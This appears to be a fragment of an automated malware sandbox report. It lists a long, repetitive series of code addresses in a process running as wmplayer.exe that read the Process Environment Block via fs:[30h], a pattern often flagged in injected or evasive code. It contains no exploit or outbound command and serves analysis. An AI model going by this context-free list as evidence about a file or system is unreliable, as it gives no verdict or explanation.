            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_032C9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_032C9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_0338B256 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_0338B256 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_032D6259 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_032CA250 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_0330724D mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_033592BC mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_033592BC mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_033592BC mov ecx, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_033592BC mov ecx, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_032E52A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_032E52A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_032E52A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_032E52A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_033662A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_033662A0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_033662A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_033662A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_033662A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_033662A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_033672A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_033672A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_033992A6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_033992A6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_033992A6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_033992A6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_0330329E mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_0330329E mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_0330E284 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_0330E284 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_03350283 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_03350283 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_03350283 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_033A5283 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_0338F2F8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_032E02E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_032E02E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_032E02E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_032C92FF mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_033812ED mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_033812ED mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_033812ED mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_033812ED mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_033812ED mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_033812ED mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_033812ED mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_033812ED mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_033812ED mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_033812ED mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_033812ED mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_033812ED mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_033812ED mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_033812ED mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_033A52E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_032D92C5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_032D92C5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_032DA2C3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_032DA2C3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_032DA2C3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_032DA2C3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_032DA2C3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_032FB2C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032FB2C0 mov eax, dword ptr fs:[00000030h]6_2_032FB2C0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032FB2C0 mov eax, dword ptr fs:[00000030h]6_2_032FB2C0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032FB2C0 mov eax, dword ptr fs:[00000030h]6_2_032FB2C0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032FB2C0 mov eax, dword ptr fs:[00000030h]6_2_032FB2C0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032FB2C0 mov eax, dword ptr fs:[00000030h]6_2_032FB2C0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032FB2C0 mov eax, dword ptr fs:[00000030h]6_2_032FB2C0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032FF2D0 mov eax, dword ptr fs:[00000030h]6_2_032FF2D0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032FF2D0 mov eax, dword ptr fs:[00000030h]6_2_032FF2D0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CB2D3 mov eax, dword ptr fs:[00000030h]6_2_032CB2D3
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CB2D3 mov eax, dword ptr fs:[00000030h]6_2_032CB2D3
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CB2D3 mov eax, dword ptr fs:[00000030h]6_2_032CB2D3
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03300124 mov eax, dword ptr fs:[00000030h]6_2_03300124
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CB136 mov eax, dword ptr fs:[00000030h]6_2_032CB136
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CB136 mov eax, dword ptr fs:[00000030h]6_2_032CB136
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CB136 mov eax, dword ptr fs:[00000030h]6_2_032CB136
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CB136 mov eax, dword ptr fs:[00000030h]6_2_032CB136
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032D1131 mov eax, dword ptr fs:[00000030h]6_2_032D1131
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032D1131 mov eax, dword ptr fs:[00000030h]6_2_032D1131
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03390115 mov eax, dword ptr fs:[00000030h]6_2_03390115
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0337A118 mov ecx, dword ptr fs:[00000030h]6_2_0337A118
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0337A118 mov eax, dword ptr fs:[00000030h]6_2_0337A118
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0337A118 mov eax, dword ptr fs:[00000030h]6_2_0337A118
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0337A118 mov eax, dword ptr fs:[00000030h]6_2_0337A118
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03369179 mov eax, dword ptr fs:[00000030h]6_2_03369179
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CF172 mov eax, dword ptr fs:[00000030h]6_2_032CF172
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CF172 mov eax, dword ptr fs:[00000030h]6_2_032CF172
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CF172 mov eax, dword ptr fs:[00000030h]6_2_032CF172
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CF172 mov eax, dword ptr fs:[00000030h]6_2_032CF172
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CF172 mov eax, dword ptr fs:[00000030h]6_2_032CF172
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CF172 mov eax, dword ptr fs:[00000030h]6_2_032CF172
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CF172 mov eax, dword ptr fs:[00000030h]6_2_032CF172
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CF172 mov eax, dword ptr fs:[00000030h]6_2_032CF172
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CF172 mov eax, dword ptr fs:[00000030h]6_2_032CF172
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CF172 mov eax, dword ptr fs:[00000030h]6_2_032CF172
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CF172 mov eax, dword ptr fs:[00000030h]6_2_032CF172
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CF172 mov eax, dword ptr fs:[00000030h]6_2_032CF172
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CF172 mov eax, dword ptr fs:[00000030h]6_2_032CF172
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CF172 mov eax, dword ptr fs:[00000030h]6_2_032CF172
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CF172 mov eax, dword ptr fs:[00000030h]6_2_032CF172
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CF172 mov eax, dword ptr fs:[00000030h]6_2_032CF172
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CF172 mov eax, dword ptr fs:[00000030h]6_2_032CF172
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CF172 mov eax, dword ptr fs:[00000030h]6_2_032CF172
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CF172 mov eax, dword ptr fs:[00000030h]6_2_032CF172
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CF172 mov eax, dword ptr fs:[00000030h]6_2_032CF172
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CF172 mov eax, dword ptr fs:[00000030h]6_2_032CF172
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032C9148 mov eax, dword ptr fs:[00000030h]6_2_032C9148
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032C9148 mov eax, dword ptr fs:[00000030h]6_2_032C9148
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032C9148 mov eax, dword ptr fs:[00000030h]6_2_032C9148
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032C9148 mov eax, dword ptr fs:[00000030h]6_2_032C9148
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033A5152 mov eax, dword ptr fs:[00000030h]6_2_033A5152
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03364144 mov eax, dword ptr fs:[00000030h]6_2_03364144
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03364144 mov eax, dword ptr fs:[00000030h]6_2_03364144
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03364144 mov ecx, dword ptr fs:[00000030h]6_2_03364144
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03364144 mov eax, dword ptr fs:[00000030h]6_2_03364144
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03364144 mov eax, dword ptr fs:[00000030h]6_2_03364144
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032D6154 mov eax, dword ptr fs:[00000030h]6_2_032D6154
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032D6154 mov eax, dword ptr fs:[00000030h]6_2_032D6154
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CC156 mov eax, dword ptr fs:[00000030h]6_2_032CC156
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032D7152 mov eax, dword ptr fs:[00000030h]6_2_032D7152
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033811A4 mov eax, dword ptr fs:[00000030h]6_2_033811A4
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033811A4 mov eax, dword ptr fs:[00000030h]6_2_033811A4
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033811A4 mov eax, dword ptr fs:[00000030h]6_2_033811A4
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033811A4 mov eax, dword ptr fs:[00000030h]6_2_033811A4
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032EB1B0 mov eax, dword ptr fs:[00000030h]6_2_032EB1B0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03327190 mov eax, dword ptr fs:[00000030h]6_2_03327190
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0335019F mov eax, dword ptr fs:[00000030h]6_2_0335019F
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0335019F mov eax, dword ptr fs:[00000030h]6_2_0335019F
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0335019F mov eax, dword ptr fs:[00000030h]6_2_0335019F
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0335019F mov eax, dword ptr fs:[00000030h]6_2_0335019F
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0338C188 mov eax, dword ptr fs:[00000030h]6_2_0338C188
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0338C188 mov eax, dword ptr fs:[00000030h]6_2_0338C188
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03310185 mov eax, dword ptr fs:[00000030h]6_2_03310185
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CA197 mov eax, dword ptr fs:[00000030h]6_2_032CA197
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CA197 mov eax, dword ptr fs:[00000030h]6_2_032CA197
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CA197 mov eax, dword ptr fs:[00000030h]6_2_032CA197
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032F51EF mov eax, dword ptr fs:[00000030h]6_2_032F51EF
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032F51EF mov eax, dword ptr fs:[00000030h]6_2_032F51EF
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032F51EF mov eax, dword ptr fs:[00000030h]6_2_032F51EF
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032F51EF mov eax, dword ptr fs:[00000030h]6_2_032F51EF
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032F51EF mov eax, dword ptr fs:[00000030h]6_2_032F51EF
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032F51EF mov eax, dword ptr fs:[00000030h]6_2_032F51EF
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032F51EF mov eax, dword ptr fs:[00000030h]6_2_032F51EF
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032F51EF mov eax, dword ptr fs:[00000030h]6_2_032F51EF
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032F51EF mov eax, dword ptr fs:[00000030h]6_2_032F51EF
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032F51EF mov eax, dword ptr fs:[00000030h]6_2_032F51EF
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032F51EF mov eax, dword ptr fs:[00000030h]6_2_032F51EF
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032F51EF mov eax, dword ptr fs:[00000030h]6_2_032F51EF
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032F51EF mov eax, dword ptr fs:[00000030h]6_2_032F51EF
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032D51ED mov eax, dword ptr fs:[00000030h]6_2_032D51ED
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033001F8 mov eax, dword ptr fs:[00000030h]6_2_033001F8
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033A61E5 mov eax, dword ptr fs:[00000030h]6_2_033A61E5
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0330D1D0 mov eax, dword ptr fs:[00000030h]6_2_0330D1D0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0330D1D0 mov ecx, dword ptr fs:[00000030h]6_2_0330D1D0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0334E1D0 mov eax, dword ptr fs:[00000030h]6_2_0334E1D0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0334E1D0 mov eax, dword ptr fs:[00000030h]6_2_0334E1D0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0334E1D0 mov ecx, dword ptr fs:[00000030h]6_2_0334E1D0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0334E1D0 mov eax, dword ptr fs:[00000030h]6_2_0334E1D0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0334E1D0 mov eax, dword ptr fs:[00000030h]6_2_0334E1D0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033A51CB mov eax, dword ptr fs:[00000030h]6_2_033A51CB
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033961C3 mov eax, dword ptr fs:[00000030h]6_2_033961C3
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033961C3 mov eax, dword ptr fs:[00000030h]6_2_033961C3
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0339903E mov eax, dword ptr fs:[00000030h]6_2_0339903E
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0339903E mov eax, dword ptr fs:[00000030h]6_2_0339903E
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0339903E mov eax, dword ptr fs:[00000030h]6_2_0339903E
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0339903E mov eax, dword ptr fs:[00000030h]6_2_0339903E
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CA020 mov eax, dword ptr fs:[00000030h]6_2_032CA020
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CC020 mov eax, dword ptr fs:[00000030h]6_2_032CC020
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03354000 mov ecx, dword ptr fs:[00000030h]6_2_03354000
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032EE016 mov eax, dword ptr fs:[00000030h]6_2_032EE016
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032EE016 mov eax, dword ptr fs:[00000030h]6_2_032EE016
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032EE016 mov eax, dword ptr fs:[00000030h]6_2_032EE016
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032EE016 mov eax, dword ptr fs:[00000030h]6_2_032EE016
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0334D070 mov ecx, dword ptr fs:[00000030h]6_2_0334D070
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033A5060 mov eax, dword ptr fs:[00000030h]6_2_033A5060
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0335106E mov eax, dword ptr fs:[00000030h]6_2_0335106E
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032FC073 mov eax, dword ptr fs:[00000030h]6_2_032FC073
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E1070 mov eax, dword ptr fs:[00000030h]6_2_032E1070
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E1070 mov ecx, dword ptr fs:[00000030h]6_2_032E1070
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E1070 mov eax, dword ptr fs:[00000030h]6_2_032E1070
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E1070 mov eax, dword ptr fs:[00000030h]6_2_032E1070
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E1070 mov eax, dword ptr fs:[00000030h]6_2_032E1070
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E1070 mov eax, dword ptr fs:[00000030h]6_2_032E1070
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E1070 mov eax, dword ptr fs:[00000030h]6_2_032E1070
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E1070 mov eax, dword ptr fs:[00000030h]6_2_032E1070
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E1070 mov eax, dword ptr fs:[00000030h]6_2_032E1070
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E1070 mov eax, dword ptr fs:[00000030h]6_2_032E1070
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E1070 mov eax, dword ptr fs:[00000030h]6_2_032E1070
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E1070 mov eax, dword ptr fs:[00000030h]6_2_032E1070
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E1070 mov eax, dword ptr fs:[00000030h]6_2_032E1070
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0337705E mov ebx, dword ptr fs:[00000030h]6_2_0337705E
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0337705E mov eax, dword ptr fs:[00000030h]6_2_0337705E
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032D2050 mov eax, dword ptr fs:[00000030h]6_2_032D2050
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032FB052 mov eax, dword ptr fs:[00000030h]6_2_032FB052
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033960B8 mov eax, dword ptr fs:[00000030h]6_2_033960B8
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033960B8 mov ecx, dword ptr fs:[00000030h]6_2_033960B8
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CD08D mov eax, dword ptr fs:[00000030h]6_2_032CD08D
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032D208A mov eax, dword ptr fs:[00000030h]6_2_032D208A
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0330909C mov eax, dword ptr fs:[00000030h]6_2_0330909C
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032D5096 mov eax, dword ptr fs:[00000030h]6_2_032D5096
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032FD090 mov eax, dword ptr fs:[00000030h]6_2_032FD090
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032FD090 mov eax, dword ptr fs:[00000030h]6_2_032FD090
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033120F0 mov ecx, dword ptr fs:[00000030h]6_2_033120F0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032D80E9 mov eax, dword ptr fs:[00000030h]6_2_032D80E9
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032F50E4 mov eax, dword ptr fs:[00000030h]6_2_032F50E4
